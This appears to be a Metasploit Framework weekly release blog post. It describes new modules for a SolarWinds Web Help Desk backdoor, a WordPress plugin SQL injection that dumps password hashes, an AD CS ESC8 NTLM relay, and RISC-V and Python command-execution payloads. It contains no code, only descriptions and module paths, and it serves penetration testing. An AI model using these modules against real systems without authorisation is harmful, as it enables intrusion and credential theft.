Last updated at Sat, 09 Nov 2024 03:29:20 GMT

RISC-V Support

This release of Metasploit Framework has added exciting new features such as new payloads that target the RISC-V architecture. These payloads allow for the execution of commands on compromised hardware, allowing Metasploit Framework and Metasploit Payloads to be used in more environments.

SMB To HTTP(S) Relay

This new exploit worked on by Rapid7 contributors targets the ESC8 vulnerability. This work is a part of the recent Kerberos and Active Directory efforts targeting multiple ESC vulnerabilities, implementing modern security workflows into Metasploit Framework.

It includes a modified SMB capture server to repackage and forward authentication from the SMB capture server to an NTLM-authenticating HTTP server. The authenticated HTTP Client is then passed to the ESC8 module which then requests the creation of certificates and downloads them.

Python Exec Payload

A new addition to the payloads catalog this week has been a new Python payload, developed by zeroSteiner allowing for the execution of arbitrary OS commands. This payload is compatible with Python 2.7 and 3.4+.

New module content (10)

SolarWinds Web Help Desk Backdoor (CVE-2024-28987)

Authors: Michael Heinzl and Zach Hanley
Type: Auxiliary
Pull request: #19499 contributed by h4x-x0r
Path: gather/solarwinds_webhelpdesk_backdoor
AttackerKB reference: CVE-2024-28987

Description: This module exploits a backdoor in SolarWinds Web Help Desk (CVE-2024-28987) <= v12.8.3 to retrieve all tickets from the system.

WordPress TI WooCommerce Wishlist SQL Injection (CVE-2024-43917)

Authors: Rafie Muhammad and Valentin Lobstein
Type: Auxiliary
Pull request: #19517 contributed by Chocapikk
Path: scanner/http/wp_ti_woocommerce_wishlist_sqli
AttackerKB reference: CVE-2024-43917

Description: This new auxiliary module exploits an unauthenticated SQL injection vulnerability in the TI WooCommerce Wishlist plugin for WordPress (versions <= 2.8.2). The vulnerability allows attackers to execute SQL queries via the order parameter which can be used to dump usernames and their hashed passwords.

ESC8 Relay: SMB to HTTP(S)

Authors: Spencer McIntyre, bwatters-r7, and jhicks-r7
Type: Auxiliary
Pull request: #19404 contributed by bwatters-r7
Path: server/relay/esc8

Description: This is an implementation of the AD CS ESC8. It includes a library that uses a modified SMB capture server to repackage and forward authentication from the SMB capture server to an NTLM-authenticating HTTP server. The authenticated HTTP Client is then passed to the ESC8 module which then requests the creation of certificates and downloads them.

Multiple RISC-V payloads

Author: bcoles bcoles@gmail.com
Pull request: #19518 contributed by bcoles and modexp

Description: Add support for RISC-V 32-bit / 64-bit Little Endian payloads. Includes Linux Execute Command payloads and Linux Reboot payloads for testing:

  • nop/riscv64le/simple - 64 bit nops module
  • nop/riscv32le/simple - 32 bit nops module
  • payload/linux/riscv32le/exec - 32 bit Linux Execute Command
  • payload/linux/riscv32le/reboot - 32 bit Linux Reboot
  • payload/linux/riscv64le/exec - 64 bit Linux Execute Command
  • payload/linux/riscv64le/reboot - 64 bit Linux Reboot

Python Execute Command

Author: Spencer McIntyre
Type: Payload (Single)
Pull request: #19528 contributed by zeroSteiner
Path: python/exec

Description: Adds a new exec payload leveraging python.

Enhancements and features (2)

  • #19529 from NtAlexio2 - This updates the pipe_dcerpc_auditor module to use the new pattern for handling port settings which offers users greater control over their targeting.
  • #19573 from adfoster-r7 - Updates Metasploit to Ruby 3.2.5.

Bugs fixed (2)

  • #19550 from Mathiou04 - Fixes an issue where when USER_AS_PASS as pass was enabled the USERNAME would not be attempted as a PASSWORD.
  • #19619 from smashery - This fixes a regression crash in the auxiliary/admin/kerberos/get_ticket module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

NEVER MISS AN EMERGING THREAT

Be the first to learn about the latest vulnerabilities and cybersecurity news.